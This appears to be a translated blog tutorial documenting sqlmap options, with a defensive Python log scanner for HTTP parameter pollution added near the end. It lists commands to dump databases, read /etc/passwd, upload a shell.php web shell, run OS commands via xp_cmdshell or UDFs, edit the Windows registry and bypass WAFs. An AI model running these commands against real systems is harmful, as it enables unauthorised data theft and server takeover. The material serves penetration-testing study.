Small white diary 46: Kali penetration test, Web penetration, sqlmap automatic injection (IV): SQLMAP parameter details: enumeration, brute force, UDF injection, file system, OS, Windows Registry, general, miscellaneous

Source: Internet
Author: User
Tags: Microsoft Access database

SQLMAP Automatic Injection

Enumeration "Data enumeration"

--privileges -U username "CU: the current account"

-D dvwa -T users -C user --columns "Specify database, table and column"

--exclude-sysdbs "Exclude system-level databases"

*******************************************************************************

# Query specific data "Premise: the current database user has permission to read the INFORMATION_SCHEMA database"

--schema --batch --exclude-sysdbs  Metadata "--batch: batch mode, use the default options and go straight to the results"
--count "Count rows"
Dump data:
--dump, -C, -T, -D, --start, --stop
--dump-all --exclude-sysdbs

--sql-query "SELECT * FROM users" "Premise: the database's tables and columns have already been queried; runs a custom SQL query statement"

******************************************************************************

Brute force "Used when there is no access to INFORMATION_SCHEMA"

Notice

1. MySQL < 5.0: there is no INFORMATION_SCHEMA database
2. MySQL >= 5.0, but the user is not authorized to read the INFORMATION_SCHEMA database

3. Microsoft Access database: by default not authorized to read MSysObjects

--common-columns (Access system tables carry no column information) "Defaults to the current column if no column is specified"

UDF injection "User-defined function injection; this is advanced injection"

Compile a shared library, upload it to the DB server and create the UDF from it to perform advanced injection

Uploaded file format: Linux: shared object; Windows: DLL

File system "Access to the file system"

--file-read="/etc/passwd"
--file-write="shell.php" --file-dest="/tmp/shell.php" "The file to upload must be in the current directory; --file-dest is the destination path on the target"

# Stored by default in .sqlmap/output

OS "Access to the operating system"

Linux systems: MySQL, PostgreSQL

Upload a shared library and generate two UDFs, sys_exec() and sys_eval()

Windows systems: MSSQL

Uses the xp_cmdshell stored procedure (used if present, enabled if disabled, created if it does not exist)

--sql-shell "SQL shell"

Windows Registry "Windows system registry. Prerequisite: the current user has permission to operate on the registry"

--reg-read

--reg-add

--reg-del

--reg-key, --reg-value, --reg-data, --reg-type

For example: sqlmap -u "http://1.1.1.1/a.aspx?id=1" --reg-add --reg-key="HKEY_LOCAL_MACHINE\software\sqlmap" --reg-value=test --reg-type=REG_SZ --reg-data=1

General "Generic options"

-s: Change where the SQLite session file is saved

default: .sqlmap/output

-t: Change where the recorded traffic file is saved

default: .sqlmap/output

--charset: Force character encoding

--charset=gbk

--crawl: Specify the crawl depth starting from the target URL

--batch --crawl=3

--csv-del: Specify the delimiter "dumped data is stored as CSV files split by "," by default"

--csv-del=";"

--dbms-cred: Specify the database account "Premise: you have the database management system account password"

# Data that has already been queried is stored in the session.

--flush-session: Flush the session "When the same site is queried again, the results come from the previously saved session data"

--force-ssl: Query HTTPS websites

--fresh-queries: Ignore the query results saved in the session

--hex: Dump non-ASCII content as hexadecimal (raw data); it is decoded and restored after retrieval and only affects the channel

sqlmap -u "http://<ip>/s.php?id=1" --hex -v 3

--output-dir=/tmp "Specify the directory for output data"

--parse-errors: Parse and display the database's built-in error messages to help identify vulnerabilities

sqlmap.py -u "http://<id>/sqlmap/a.asp?id=" --parse-errors

--save: Save the command as a configuration file at the specified location

Miscellaneous "Miscellaneous options"

-z: Option mnemonics "options can be abbreviated and written as one option set"

For example: sqlmap --batch --random-agent --ignore-proxy --technique=BEU -u "1.1.1.1/a.asp?id=1"

sqlmap -z "bat,random,ign,tec=BEU" -u "1.1.1.1/a.asp?id=1"

--answer: Preset answers to specific prompts "similar to --batch"

sqlmap -u "http://<ip>/a.php?id=1" --technique=E --answer="extending=N" --batch

--check-waf: Detect WAF/IPS/IDS

--hpp: HTTP parameter pollution "by nature a vulnerability on the web side"

An effective way to bypass WAF/IPS/IDS

Especially for ASP/IIS and ASP.NET/IIS.
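From the defender's side, the footprint --hpp leaves is a query string that repeats a parameter name. The following is an added example, not code from the original post: a small Python scanner over constructed combined-format access-log lines that flags such requests. The ALLOWED_REPEATS allow-list of parameters the application legitimately repeats is an assumption to tune per site.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /a.asp?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /a.asp?id=1&id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search.asp?tag=a&tag=b HTTP/1.1" 200 300 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /a.php?id=1&id=1&id=1&id=1 HTTP/1.1" 500 120 "-" "sqlmap/1.7"
"""

# Assumption: parameters this application sends more than once on purpose (e.g. multi-select).
ALLOWED_REPEATS = {"tag"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def repeated_params(target):
    """Return {name: [values]} for query parameters that occur more than once in the request target."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    counts = Counter(name for name, _ in pairs)
    return {name: [v for n, v in pairs if n == name] for name, c in counts.items() if c > 1}


def scan_log(text):
    """Return one finding per request whose duplicated parameters are not on the allow-list."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        dups = {k: v for k, v in repeated_params(m["target"]).items() if k not in ALLOWED_REPEATS}
        if dups:
            findings.append({
                "ip": m["ip"],
                "path": urlsplit(m["target"]).path,
                "params": dups,
                "status": int(m["status"]),
                "ua": m["ua"],
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 5xx status next to a duplicated parameter (the last sample line) is worth correlating with the DBMS error log, since --parse-errors relies on exactly those messages leaking back to the client.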

--identify-waf: Thorough WAF/IPS/IDS check "because some WAFs filter only the first occurrence of the username"

Supports more than 30 products

*************************************************************************

--mobile: Imitate a smartphone device

--purge-output: Clear the output folder

--smart: When there are many targets, only error-based detection results are followed up

--wizard: Wizard interface
